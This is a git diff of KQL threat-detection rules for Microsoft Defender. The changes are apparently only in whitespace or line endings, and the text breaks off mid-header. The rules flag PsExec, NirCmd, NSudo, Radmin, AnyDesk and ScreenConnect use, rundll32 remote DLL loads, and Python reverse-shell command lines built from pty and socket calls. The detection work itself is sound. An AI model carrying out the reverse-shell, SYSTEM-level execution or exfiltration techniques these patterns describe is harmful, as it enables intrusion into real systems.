+DeviceProcessEvents | where FolderPath endswith "\\psexec.exe" or ProcessVersionInfoOriginalFileName =~ "psexec.c" \ No newline at end of file diff --git a/KQL/rules/Execution/psexec_service_child_process_execution_as_local_system.kql b/KQL/rules/Execution/psexec_service_child_process_execution_as_local_system.kql index 09046461..66caf128 100644 --- a/KQL/rules/Execution/psexec_service_child_process_execution_as_local_system.kql +++ b/KQL/rules/Execution/psexec_service_child_process_execution_as_local_system.kql @@ -1,12 +1,12 @@ -// Title: PsExec Service Child Process Execution as LOCAL SYSTEM -// Author: Florian Roth (Nextron Systems) -// Date: 2022-07-21 -// Level: high -// Description: Detects suspicious launch of the PSEXESVC service on this system and a sub process run as LOCAL_SYSTEM (-s), which means that someone remotely started a command on this system running it with highest privileges and not only the privileges of the login user account (e.g. the administrator account) -// MITRE Tactic: Execution -// Tags: attack.execution -// False Positives: -// - Users that debug Microsoft Intune issues using the commands mentioned in the official documentation; see https://learn.microsoft.com/en-us/mem/intune/apps/intune-management-extension - -DeviceProcessEvents +// Title: PsExec Service Child Process Execution as LOCAL SYSTEM +// Author: Florian Roth (Nextron Systems) +// Date: 2022-07-21 +// Level: high +// Description: Detects suspicious launch of the PSEXESVC service on this system and a sub process run as LOCAL_SYSTEM (-s), which means that someone remotely started a command on this system running it with highest privileges and not only the privileges of the login user account (e.g. the administrator account) +// MITRE Tactic: Execution +// Tags: attack.execution +// False Positives: +// - Users that debug Microsoft Intune issues using the commands mentioned in the official documentation; see https://learn.microsoft.com/en-us/mem/intune/apps/intune-management-extension + +DeviceProcessEvents | where InitiatingProcessFolderPath =~ "C:\\Windows\\PSEXESVC.exe" and (AccountName contains "AUTHORI" or AccountName contains "AUTORI") \ No newline at end of file diff --git a/KQL/rules/Execution/psexec_service_execution.kql b/KQL/rules/Execution/psexec_service_execution.kql index 56742b39..0286c4be 100644 --- a/KQL/rules/Execution/psexec_service_execution.kql +++ b/KQL/rules/Execution/psexec_service_execution.kql @@ -1,12 +1,12 @@ -// Title: PsExec Service Execution -// Author: Thomas Patzke, Romaissa Adjailia, Florian Roth (Nextron Systems) -// Date: 2017-06-12 -// Level: medium -// Description: Detects launch of the PSEXESVC service, which means that this system was the target of a psexec remote execution -// MITRE Tactic: Execution -// Tags: attack.execution -// False Positives: -// - Legitimate administrative tasks - -DeviceProcessEvents +// Title: PsExec Service Execution +// Author: Thomas Patzke, Romaissa Adjailia, Florian Roth (Nextron Systems) +// Date: 2017-06-12 +// Level: medium +// Description: Detects launch of the PSEXESVC service, which means that this system was the target of a psexec remote execution +// MITRE Tactic: Execution +// Tags: attack.execution +// False Positives: +// - Legitimate administrative tasks + +DeviceProcessEvents | where FolderPath =~ "C:\\Windows\\PSEXESVC.exe" or ProcessVersionInfoOriginalFileName =~ "psexesvc.exe" \ No newline at end of file diff --git a/KQL/rules/Execution/psexec_service_file_creation.kql b/KQL/rules/Execution/psexec_service_file_creation.kql index b1087ac5..50c6f190 100644 --- a/KQL/rules/Execution/psexec_service_file_creation.kql +++ b/KQL/rules/Execution/psexec_service_file_creation.kql @@ -1,10 +1,10 @@ -// Title: PsExec Service File Creation -// Author: Thomas Patzke -// Date: 2017-06-12 -// Level: low -// Description: Detects default PsExec service filename which indicates PsExec service installation and execution -// MITRE Tactic: Execution -// Tags: attack.execution, attack.t1569.002, attack.s0029 - -DeviceFileEvents +// Title: PsExec Service File Creation +// Author: Thomas Patzke +// Date: 2017-06-12 +// Level: low +// Description: Detects default PsExec service filename which indicates PsExec service installation and execution +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1569.002, attack.s0029 + +DeviceFileEvents | where FolderPath endswith "\\PSEXESVC.exe" \ No newline at end of file diff --git a/KQL/rules/Execution/pua_advancedrun_execution.kql b/KQL/rules/Execution/pua_advancedrun_execution.kql index 6e2ae8db..5f4e73f9 100644 --- a/KQL/rules/Execution/pua_advancedrun_execution.kql +++ b/KQL/rules/Execution/pua_advancedrun_execution.kql @@ -1,10 +1,10 @@ -// Title: PUA - AdvancedRun Execution -// Author: Florian Roth (Nextron Systems) -// Date: 2022-01-20 -// Level: medium -// Description: Detects the execution of AdvancedRun utility -// MITRE Tactic: Execution -// Tags: attack.execution, attack.defense-evasion, attack.privilege-escalation, attack.t1564.003, attack.t1134.002, attack.t1059.003 - -DeviceProcessEvents +// Title: PUA - AdvancedRun Execution +// Author: Florian Roth (Nextron Systems) +// Date: 2022-01-20 +// Level: medium +// Description: Detects the execution of AdvancedRun utility +// MITRE Tactic: Execution +// Tags: attack.execution, attack.defense-evasion, attack.privilege-escalation, attack.t1564.003, attack.t1134.002, attack.t1059.003 + +DeviceProcessEvents | where ProcessVersionInfoOriginalFileName =~ "AdvancedRun.exe" or (ProcessCommandLine contains " /EXEFilename " and ProcessCommandLine contains " /Run") or (ProcessCommandLine contains " /WindowState 0" and ProcessCommandLine contains " /RunAs " and ProcessCommandLine contains " /CommandLine ") \ No newline at end of file diff --git a/KQL/rules/Execution/pua_nircmd_execution.kql b/KQL/rules/Execution/pua_nircmd_execution.kql index b63c5e66..da609a4d 100644 --- a/KQL/rules/Execution/pua_nircmd_execution.kql +++ b/KQL/rules/Execution/pua_nircmd_execution.kql @@ -1,12 +1,12 @@ -// Title: PUA - NirCmd Execution -// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) -// Date: 2022-01-24 -// Level: medium -// Description: Detects the use of NirCmd tool for command execution, which could be the result of legitimate administrative activity -// MITRE Tactic: Execution -// Tags: attack.execution, attack.t1569.002, attack.s0029 -// False Positives: -// - Legitimate use by administrators - -DeviceProcessEvents +// Title: PUA - NirCmd Execution +// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-01-24 +// Level: medium +// Description: Detects the use of NirCmd tool for command execution, which could be the result of legitimate administrative activity +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1569.002, attack.s0029 +// False Positives: +// - Legitimate use by administrators + +DeviceProcessEvents | where ((ProcessCommandLine contains " execmd " or ProcessCommandLine contains ".exe script " or ProcessCommandLine contains ".exe shexec " or ProcessCommandLine contains " runinteractive ") or (FolderPath endswith "\\NirCmd.exe" or ProcessVersionInfoOriginalFileName =~ "NirCmd.exe")) or ((ProcessCommandLine contains " exec " or ProcessCommandLine contains " exec2 ") and (ProcessCommandLine contains " show " or ProcessCommandLine contains " hide ")) \ No newline at end of file diff --git a/KQL/rules/Execution/pua_nircmd_execution_as_local_system.kql b/KQL/rules/Execution/pua_nircmd_execution_as_local_system.kql index b7733538..df76df83 100644 --- a/KQL/rules/Execution/pua_nircmd_execution_as_local_system.kql +++ b/KQL/rules/Execution/pua_nircmd_execution_as_local_system.kql @@ -1,12 +1,12 @@ -// Title: PUA - NirCmd Execution As LOCAL SYSTEM -// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) -// Date: 2022-01-24 -// Level: high -// Description: Detects the use of NirCmd tool for command execution as SYSTEM user -// MITRE Tactic: Execution -// Tags: attack.execution, attack.t1569.002, attack.s0029 -// False Positives: -// - Legitimate use by administrators - -DeviceProcessEvents +// Title: PUA - NirCmd Execution As LOCAL SYSTEM +// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-01-24 +// Level: high +// Description: Detects the use of NirCmd tool for command execution as SYSTEM user +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1569.002, attack.s0029 +// False Positives: +// - Legitimate use by administrators + +DeviceProcessEvents | where ProcessCommandLine contains " runassystem " \ No newline at end of file diff --git a/KQL/rules/Execution/pua_nsudo_execution.kql b/KQL/rules/Execution/pua_nsudo_execution.kql index 6a97abed..4a6a6c26 100644 --- a/KQL/rules/Execution/pua_nsudo_execution.kql +++ b/KQL/rules/Execution/pua_nsudo_execution.kql @@ -1,12 +1,12 @@ -// Title: PUA - NSudo Execution -// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali -// Date: 2022-01-24 -// Level: high -// Description: Detects the use of NSudo tool for command execution -// MITRE Tactic: Execution -// Tags: attack.execution, attack.t1569.002, attack.s0029 -// False Positives: -// - Legitimate use by administrators - -DeviceProcessEvents +// Title: PUA - NSudo Execution +// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali +// Date: 2022-01-24 +// Level: high +// Description: Detects the use of NSudo tool for command execution +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1569.002, attack.s0029 +// False Positives: +// - Legitimate use by administrators + +DeviceProcessEvents | where (ProcessCommandLine contains "-U:S " or ProcessCommandLine contains "-U:T " or ProcessCommandLine contains "-U:E " or ProcessCommandLine contains "-P:E " or ProcessCommandLine contains "-M:S " or ProcessCommandLine contains "-M:H " or ProcessCommandLine contains "-U=S " or ProcessCommandLine contains "-U=T " or ProcessCommandLine contains "-U=E " or ProcessCommandLine contains "-P=E " or ProcessCommandLine contains "-M=S " or ProcessCommandLine contains "-M=H " or ProcessCommandLine contains "-ShowWindowMode:Hide") and ((FolderPath endswith "\\NSudo.exe" or FolderPath endswith "\\NSudoLC.exe" or FolderPath endswith "\\NSudoLG.exe") or (ProcessVersionInfoOriginalFileName in~ ("NSudo.exe", "NSudoLC.exe", "NSudoLG.exe"))) \ No newline at end of file diff --git a/KQL/rules/Execution/pua_radmin_viewer_utility_execution.kql b/KQL/rules/Execution/pua_radmin_viewer_utility_execution.kql index b5afa733..4f9233c4 100644 --- a/KQL/rules/Execution/pua_radmin_viewer_utility_execution.kql +++ b/KQL/rules/Execution/pua_radmin_viewer_utility_execution.kql @@ -1,10 +1,10 @@ -// Title: PUA - Radmin Viewer Utility Execution -// Author: frack113 -// Date: 2022-01-22 -// Level: medium -// Description: Detects the execution of Radmin which can be abused by an adversary to remotely control Windows machines -// MITRE Tactic: Execution -// Tags: attack.execution, attack.lateral-movement, attack.t1072 - -DeviceProcessEvents +// Title: PUA - Radmin Viewer Utility Execution +// Author: frack113 +// Date: 2022-01-22 +// Level: medium +// Description: Detects the execution of Radmin which can be abused by an adversary to remotely control Windows machines +// MITRE Tactic: Execution +// Tags: attack.execution, attack.lateral-movement, attack.t1072 + +DeviceProcessEvents | where ProcessVersionInfoFileDescription =~ "Radmin Viewer" or ProcessVersionInfoProductName =~ "Radmin Viewer" or ProcessVersionInfoOriginalFileName =~ "Radmin.exe" \ No newline at end of file diff --git a/KQL/rules/Execution/pua_runxcmd_execution.kql b/KQL/rules/Execution/pua_runxcmd_execution.kql index 9f1eaeaf..945ac7af 100644 --- a/KQL/rules/Execution/pua_runxcmd_execution.kql +++ b/KQL/rules/Execution/pua_runxcmd_execution.kql @@ -1,12 +1,12 @@ -// Title: PUA - RunXCmd Execution -// Author: Florian Roth (Nextron Systems) -// Date: 2022-01-24 -// Level: high -// Description: Detects the use of the RunXCmd tool to execute commands with System or TrustedInstaller accounts -// MITRE Tactic: Execution -// Tags: attack.execution, attack.t1569.002, attack.s0029 -// False Positives: -// - Legitimate use by administrators - -DeviceProcessEvents +// Title: PUA - RunXCmd Execution +// Author: Florian Roth (Nextron Systems) +// Date: 2022-01-24 +// Level: high +// Description: Detects the use of the RunXCmd tool to execute commands with System or TrustedInstaller accounts +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1569.002, attack.s0029 +// False Positives: +// - Legitimate use by administrators + +DeviceProcessEvents | where (ProcessCommandLine contains " /account=system " or ProcessCommandLine contains " /account=ti ") and ProcessCommandLine contains "/exec=" \ No newline at end of file diff --git a/KQL/rules/Execution/pua_wsudo_suspicious_execution.kql b/KQL/rules/Execution/pua_wsudo_suspicious_execution.kql index 462dc670..bbdbff02 100644 --- a/KQL/rules/Execution/pua_wsudo_suspicious_execution.kql +++ b/KQL/rules/Execution/pua_wsudo_suspicious_execution.kql @@ -1,10 +1,10 @@ -// Title: PUA - Wsudo Suspicious Execution -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022-12-02 -// Level: high -// Description: Detects usage of wsudo (Windows Sudo Utility). Which is a tool that let the user execute programs with different permissions (System, Trusted Installer, Administrator...etc) -// MITRE Tactic: Execution -// Tags: attack.execution, attack.privilege-escalation, attack.t1059 - -DeviceProcessEvents +// Title: PUA - Wsudo Suspicious Execution +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-12-02 +// Level: high +// Description: Detects usage of wsudo (Windows Sudo Utility). Which is a tool that let the user execute programs with different permissions (System, Trusted Installer, Administrator...etc) +// MITRE Tactic: Execution +// Tags: attack.execution, attack.privilege-escalation, attack.t1059 + +DeviceProcessEvents | where (ProcessCommandLine contains "-u System" or ProcessCommandLine contains "-uSystem" or ProcessCommandLine contains "-u TrustedInstaller" or ProcessCommandLine contains "-uTrustedInstaller" or ProcessCommandLine contains " --ti ") or (FolderPath endswith "\\wsudo.exe" or ProcessVersionInfoOriginalFileName =~ "wsudo.exe" or ProcessVersionInfoFileDescription =~ "Windows sudo utility" or InitiatingProcessFolderPath endswith "\\wsudo-bridge.exe") \ No newline at end of file diff --git a/KQL/rules/Execution/python_inline_command_execution.kql b/KQL/rules/Execution/python_inline_command_execution.kql index 7156c54c..f8f4b4ac 100644 --- a/KQL/rules/Execution/python_inline_command_execution.kql +++ b/KQL/rules/Execution/python_inline_command_execution.kql @@ -1,12 +1,12 @@ -// Title: Python Inline Command Execution -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-01-02 -// Level: medium -// Description: Detects execution of python using the "-c" flag. This is could be used as a way to launch a reverse shell or execute live python code. -// MITRE Tactic: Execution -// Tags: attack.execution, attack.t1059 -// False Positives: -// - Python libraries that use a flag starting with "-c". Filter according to your environment - -DeviceProcessEvents +// Title: Python Inline Command Execution +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-01-02 +// Level: medium +// Description: Detects execution of python using the "-c" flag. This is could be used as a way to launch a reverse shell or execute live python code. +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059 +// False Positives: +// - Python libraries that use a flag starting with "-c". Filter according to your environment + +DeviceProcessEvents | where (ProcessCommandLine contains " -c" and (ProcessVersionInfoOriginalFileName =~ "python.exe" or (FolderPath endswith "python.exe" or FolderPath endswith "python3.exe" or FolderPath endswith "python2.exe"))) and (not(((InitiatingProcessCommandLine contains "-E -s -m ensurepip -U --default-pip" and InitiatingProcessFolderPath endswith "\\python.exe" and (InitiatingProcessFolderPath startswith "C:\\Program Files\\Python" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Python")) or ((ProcessCommandLine contains "-W ignore::DeprecationWarning" and ProcessCommandLine contains "['install', '--no-cache-dir', '--no-index', '--find-links'," and ProcessCommandLine contains "'--upgrade', 'pip'") and (InitiatingProcessFolderPath startswith "C:\\Program Files\\Python" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Python"))))) and (not(((ProcessCommandLine contains "" and ProcessCommandLine contains "exec(compile(") or (InitiatingProcessFolderPath endswith "\\AppData\\Local\\Programs\\Microsoft VS Code\\Code.exe" or (InitiatingProcessFolderPath in~ ("C:\\Program Files\\Microsoft VS Code\\Code.exe", "C:\\Program Files (x86)\\Microsoft VS Code\\Code.exe")))))) \ No newline at end of file diff --git a/KQL/rules/Execution/python_reverse_shell_execution_via_pty_and_socket_modules.kql b/KQL/rules/Execution/python_reverse_shell_execution_via_pty_and_socket_modules.kql index 62468ada..60bfc298 100644 --- a/KQL/rules/Execution/python_reverse_shell_execution_via_pty_and_socket_modules.kql +++ b/KQL/rules/Execution/python_reverse_shell_execution_via_pty_and_socket_modules.kql @@ -1,10 +1,10 @@ -// Title: Python Reverse Shell Execution Via PTY And Socket Modules -// Author: @d4ns4n_, Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-04-24 -// Level: high -// Description: Detects the execution of python with calls to the socket and pty module in order to connect and spawn a potential reverse shell. -// MITRE Tactic: Execution -// Tags: attack.execution - -DeviceProcessEvents +// Title: Python Reverse Shell Execution Via PTY And Socket Modules +// Author: @d4ns4n_, Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-04-24 +// Level: high +// Description: Detects the execution of python with calls to the socket and pty module in order to connect and spawn a potential reverse shell. +// MITRE Tactic: Execution +// Tags: attack.execution + +DeviceProcessEvents | where (ProcessCommandLine contains " -c " and ProcessCommandLine contains "import" and ProcessCommandLine contains "pty" and ProcessCommandLine contains "socket" and ProcessCommandLine contains "spawn" and ProcessCommandLine contains ".connect") and FolderPath contains "python" \ No newline at end of file diff --git a/KQL/rules/Execution/python_spawning_pretty_tty_on_windows.kql b/KQL/rules/Execution/python_spawning_pretty_tty_on_windows.kql index 235e05ac..a156ddbb 100644 --- a/KQL/rules/Execution/python_spawning_pretty_tty_on_windows.kql +++ b/KQL/rules/Execution/python_spawning_pretty_tty_on_windows.kql @@ -1,10 +1,10 @@ -// Title: Python Spawning Pretty TTY on Windows -// Author: Nextron Systems -// Date: 2022-06-03 -// Level: high -// Description: Detects python spawning a pretty tty -// MITRE Tactic: Execution -// Tags: attack.execution, attack.t1059 - -DeviceProcessEvents +// Title: Python Spawning Pretty TTY on Windows +// Author: Nextron Systems +// Date: 2022-06-03 +// Level: high +// Description: Detects python spawning a pretty tty +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059 + +DeviceProcessEvents | where (FolderPath endswith "python.exe" or FolderPath endswith "python3.exe" or FolderPath endswith "python2.exe") and ((ProcessCommandLine contains "import pty" and ProcessCommandLine contains ".spawn(") or ProcessCommandLine contains "from pty import spawn") \ No newline at end of file diff --git a/KQL/rules/Execution/python_spawning_pretty_tty_via_pty_module.kql b/KQL/rules/Execution/python_spawning_pretty_tty_via_pty_module.kql index bc26a317..5e2e796d 100644 --- a/KQL/rules/Execution/python_spawning_pretty_tty_via_pty_module.kql +++ b/KQL/rules/Execution/python_spawning_pretty_tty_via_pty_module.kql @@ -1,10 +1,10 @@ -// Title: Python Spawning Pretty TTY Via PTY Module -// Author: Nextron Systems -// Date: 2022-06-03 -// Level: medium -// Description: Detects a python process calling to the PTY module in order to spawn a pretty tty which could be indicative of potential reverse shell activity. -// MITRE Tactic: Execution -// Tags: attack.execution, attack.t1059 - -DeviceProcessEvents +// Title: Python Spawning Pretty TTY Via PTY Module +// Author: Nextron Systems +// Date: 2022-06-03 +// Level: medium +// Description: Detects a python process calling to the PTY module in order to spawn a pretty tty which could be indicative of potential reverse shell activity. +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059 + +DeviceProcessEvents | where (ProcessCommandLine contains "import pty" or ProcessCommandLine contains "from pty ") and ProcessCommandLine contains "spawn" and ((FolderPath endswith "/python" or FolderPath endswith "/python2" or FolderPath endswith "/python3") or (FolderPath contains "/python2." or FolderPath contains "/python3.")) \ No newline at end of file diff --git a/KQL/rules/Execution/query_usage_to_exfil_data.kql b/KQL/rules/Execution/query_usage_to_exfil_data.kql index 1939f522..fff4c787 100644 --- a/KQL/rules/Execution/query_usage_to_exfil_data.kql +++ b/KQL/rules/Execution/query_usage_to_exfil_data.kql @@ -1,10 +1,10 @@ -// Title: Query Usage To Exfil Data -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022-08-01 -// Level: medium -// Description: Detects usage of "query.exe" a system binary to exfil information such as "sessions" and "processes" for later use -// MITRE Tactic: Execution -// Tags: attack.execution - -DeviceProcessEvents +// Title: Query Usage To Exfil Data +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-08-01 +// Level: medium +// Description: Detects usage of "query.exe" a system binary to exfil information such as "sessions" and "processes" for later use +// MITRE Tactic: Execution +// Tags: attack.execution + +DeviceProcessEvents | where (ProcessCommandLine contains "session >" or ProcessCommandLine contains "process >") and FolderPath endswith ":\\Windows\\System32\\query.exe" \ No newline at end of file diff --git a/KQL/rules/Execution/read_contents_from_stdin_via_cmd_exe.kql b/KQL/rules/Execution/read_contents_from_stdin_via_cmd_exe.kql index 281ffec0..f0a44140 100644 --- a/KQL/rules/Execution/read_contents_from_stdin_via_cmd_exe.kql +++ b/KQL/rules/Execution/read_contents_from_stdin_via_cmd_exe.kql @@ -1,10 +1,10 @@ -// Title: Read Contents From Stdin Via Cmd.EXE -// Author: frack113, Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-03-07 -// Level: medium -// Description: Detect the use of "<" to read and potentially execute a file via cmd.exe -// MITRE Tactic: Execution -// Tags: attack.execution, attack.t1059.003 - -DeviceProcessEvents +// Title: Read Contents From Stdin Via Cmd.EXE +// Author: frack113, Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-03-07 +// Level: medium +// Description: Detect the use of "<" to read and potentially execute a file via cmd.exe +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059.003 + +DeviceProcessEvents | where ProcessCommandLine contains "<" and (ProcessVersionInfoOriginalFileName =~ "Cmd.Exe" or FolderPath endswith "\\cmd.exe") \ No newline at end of file diff --git a/KQL/rules/Execution/rebuild_performance_counter_values_via_lodctr_exe.kql b/KQL/rules/Execution/rebuild_performance_counter_values_via_lodctr_exe.kql index 84cb2c88..bfc0adbc 100644 --- a/KQL/rules/Execution/rebuild_performance_counter_values_via_lodctr_exe.kql +++ b/KQL/rules/Execution/rebuild_performance_counter_values_via_lodctr_exe.kql @@ -1,12 +1,12 @@ -// Title: Rebuild Performance Counter Values Via Lodctr.EXE -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-06-15 -// Level: medium -// Description: Detects the execution of "lodctr.exe" to rebuild the performance counter registry values. This can be abused by attackers by providing a malicious config file to overwrite performance counter configuration to confuse and evade monitoring and security solutions. -// MITRE Tactic: Execution -// Tags: attack.execution -// False Positives: -// - Legitimate usage by an administrator - -DeviceProcessEvents +// Title: Rebuild Performance Counter Values Via Lodctr.EXE +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-06-15 +// Level: medium +// Description: Detects the execution of "lodctr.exe" to rebuild the performance counter registry values. This can be abused by attackers by providing a malicious config file to overwrite performance counter configuration to confuse and evade monitoring and security solutions. +// MITRE Tactic: Execution +// Tags: attack.execution +// False Positives: +// - Legitimate usage by an administrator + +DeviceProcessEvents | where (ProcessCommandLine contains " -r" or ProcessCommandLine contains " /r" or ProcessCommandLine contains " –r" or ProcessCommandLine contains " —r" or ProcessCommandLine contains " ―r") and (FolderPath endswith "\\lodctr.exe" and ProcessVersionInfoOriginalFileName =~ "LODCTR.EXE") \ No newline at end of file diff --git a/KQL/rules/Execution/remcom_service_file_creation.kql b/KQL/rules/Execution/remcom_service_file_creation.kql index 9a539835..82601c7f 100644 --- a/KQL/rules/Execution/remcom_service_file_creation.kql +++ b/KQL/rules/Execution/remcom_service_file_creation.kql @@ -1,10 +1,10 @@ -// Title: RemCom Service File Creation -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-08-04 -// Level: medium -// Description: Detects default RemCom service filename which indicates RemCom service installation and execution -// MITRE Tactic: Execution -// Tags: attack.execution, attack.t1569.002, attack.s0029 - -DeviceFileEvents +// Title: RemCom Service File Creation +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-08-04 +// Level: medium +// Description: Detects default RemCom service filename which indicates RemCom service installation and execution +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1569.002, attack.s0029 + +DeviceFileEvents | where FolderPath endswith "\\RemComSvc.exe" \ No newline at end of file diff --git a/KQL/rules/Execution/remote_access_tool_anydesk_execution_with_known_revoked_signing_certificate.kql b/KQL/rules/Execution/remote_access_tool_anydesk_execution_with_known_revoked_signing_certificate.kql index 49adea19..b52c3367 100644 --- a/KQL/rules/Execution/remote_access_tool_anydesk_execution_with_known_revoked_signing_certificate.kql +++ b/KQL/rules/Execution/remote_access_tool_anydesk_execution_with_known_revoked_signing_certificate.kql @@ -1,15 +1,15 @@ -// Title: Remote Access Tool - AnyDesk Execution With Known Revoked Signing Certificate -// Author: Sai Prashanth Pulisetti, Nasreddine Bencherchali (Nextron Systems) -// Date: 2024-02-08 -// Level: medium -// Description: Detects the execution of an AnyDesk binary with a version prior to 8.0.8. -// Prior to version 8.0.8, the Anydesk application used a signing certificate that got compromised by threat actors. -// Use this rule to detect instances of older versions of Anydesk using the compromised certificate -// This is recommended in order to avoid attackers leveraging the certificate and signing their binaries to bypass detections. -// MITRE Tactic: Execution -// Tags: attack.execution, attack.initial-access -// False Positives: -// - Unlikely - -DeviceProcessEvents +// Title: Remote Access Tool - AnyDesk Execution With Known Revoked Signing Certificate +// Author: Sai Prashanth Pulisetti, Nasreddine Bencherchali (Nextron Systems) +// Date: 2024-02-08 +// Level: medium +// Description: Detects the execution of an AnyDesk binary with a version prior to 8.0.8. +// Prior to version 8.0.8, the Anydesk application used a signing certificate that got compromised by threat actors. +// Use this rule to detect instances of older versions of Anydesk using the compromised certificate +// This is recommended in order to avoid attackers leveraging the certificate and signing their binaries to bypass detections. +// MITRE Tactic: Execution +// Tags: attack.execution, attack.initial-access +// False Positives: +// - Unlikely + +DeviceProcessEvents | where ((FolderPath endswith "\\AnyDesk.exe" or ProcessVersionInfoFileDescription =~ "AnyDesk" or ProcessVersionInfoProductName =~ "AnyDesk" or ProcessVersionInfoCompanyName =~ "AnyDesk Software GmbH") and (ProcessVersionInfoProductVersion startswith "7.0." or ProcessVersionInfoProductVersion startswith "7.1." or ProcessVersionInfoProductVersion startswith "8.0.1" or ProcessVersionInfoProductVersion startswith "8.0.2" or ProcessVersionInfoProductVersion startswith "8.0.3" or ProcessVersionInfoProductVersion startswith "8.0.4" or ProcessVersionInfoProductVersion startswith "8.0.5" or ProcessVersionInfoProductVersion startswith "8.0.6" or ProcessVersionInfoProductVersion startswith "8.0.7")) and (not((ProcessCommandLine contains " --remove" or ProcessCommandLine contains " --uninstall"))) \ No newline at end of file diff --git a/KQL/rules/Execution/remote_access_tool_screenconnect_remote_command_execution.kql b/KQL/rules/Execution/remote_access_tool_screenconnect_remote_command_execution.kql index a7e2f8ec..41bc9f2f 100644 --- a/KQL/rules/Execution/remote_access_tool_screenconnect_remote_command_execution.kql +++ b/KQL/rules/Execution/remote_access_tool_screenconnect_remote_command_execution.kql @@ -1,12 +1,12 @@ -// Title: Remote Access Tool - ScreenConnect Remote Command Execution -// Author: Ali Alwashali -// Date: 2023-10-10 -// Level: low -// Description: Detects the execution of a system command via the ScreenConnect RMM service. -// MITRE Tactic: Execution -// Tags: attack.execution, attack.t1059.003 -// False Positives: -// - Legitimate use of ScreenConnect. Disable this rule if ScreenConnect is heavily used. - -DeviceProcessEvents +// Title: Remote Access Tool - ScreenConnect Remote Command Execution +// Author: Ali Alwashali +// Date: 2023-10-10 +// Level: low +// Description: Detects the execution of a system command via the ScreenConnect RMM service. +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059.003 +// False Positives: +// - Legitimate use of ScreenConnect. Disable this rule if ScreenConnect is heavily used. + +DeviceProcessEvents | where ProcessCommandLine contains "\\TEMP\\ScreenConnect\\" and (FolderPath endswith "\\cmd.exe" or ProcessVersionInfoOriginalFileName =~ "Cmd.Exe") and InitiatingProcessFolderPath endswith "\\ScreenConnect.ClientService.exe" \ No newline at end of file diff --git a/KQL/rules/Execution/remote_access_tool_screenconnect_temporary_file.kql b/KQL/rules/Execution/remote_access_tool_screenconnect_temporary_file.kql index 88143191..4ba6c0c6 100644 --- a/KQL/rules/Execution/remote_access_tool_screenconnect_temporary_file.kql +++ b/KQL/rules/Execution/remote_access_tool_screenconnect_temporary_file.kql @@ -1,13 +1,13 @@ -// Title: Remote Access Tool - ScreenConnect Temporary File -// Author: Ali Alwashali -// Date: 2023-10-10 -// Level: low -// Description: Detects the creation of files in a specific location by ScreenConnect RMM. -// ScreenConnect has feature to remotely execute binaries on a target machine. These binaries will be dropped to ":\Users\\Documents\ConnectWiseControl\Temp\" before execution. -// MITRE Tactic: Execution -// Tags: attack.execution, attack.t1059.003 -// False Positives: -// - Legitimate use of ScreenConnect - -DeviceFileEvents +// Title: Remote Access Tool - ScreenConnect Temporary File +// Author: Ali Alwashali +// Date: 2023-10-10 +// Level: low +// Description: Detects the creation of files in a specific location by ScreenConnect RMM. +// ScreenConnect has feature to remotely execute binaries on a target machine. These binaries will be dropped to ":\Users\\Documents\ConnectWiseControl\Temp\" before execution. +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059.003 +// False Positives: +// - Legitimate use of ScreenConnect + +DeviceFileEvents | where InitiatingProcessFolderPath endswith "\\ScreenConnect.WindowsClient.exe" and FolderPath contains "\\Documents\\ConnectWiseControl\\Temp\\" \ No newline at end of file diff --git a/KQL/rules/Execution/remote_dll_load_via_rundll32_exe.kql b/KQL/rules/Execution/remote_dll_load_via_rundll32_exe.kql index 97a8b480..df73b109 100644 --- a/KQL/rules/Execution/remote_dll_load_via_rundll32_exe.kql +++ b/KQL/rules/Execution/remote_dll_load_via_rundll32_exe.kql @@ -1,10 +1,10 @@ -// Title: Remote DLL Load Via Rundll32.EXE -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-09-18 -// Level: medium -// Description: Detects a remote DLL load event via "rundll32.exe". -// MITRE Tactic: Execution -// Tags: attack.execution, attack.t1204.002 - -DeviceImageLoadEvents +// Title: Remote DLL Load Via Rundll32.EXE +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-09-18 +// Level: medium +// Description: Detects a remote DLL load event via "rundll32.exe". +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1204.002 + +DeviceImageLoadEvents | where FolderPath startswith "\\\\" and InitiatingProcessFolderPath endswith "\\rundll32.exe" \ No newline at end of file diff --git a/KQL/rules/Execution/remote_powershell_session_host_process_winrm_.kql b/KQL/rules/Execution/remote_powershell_session_host_process_winrm_.kql index 65dc81c2..bf8492a6 100644 --- a/KQL/rules/Execution/remote_powershell_session_host_process_winrm_.kql +++ 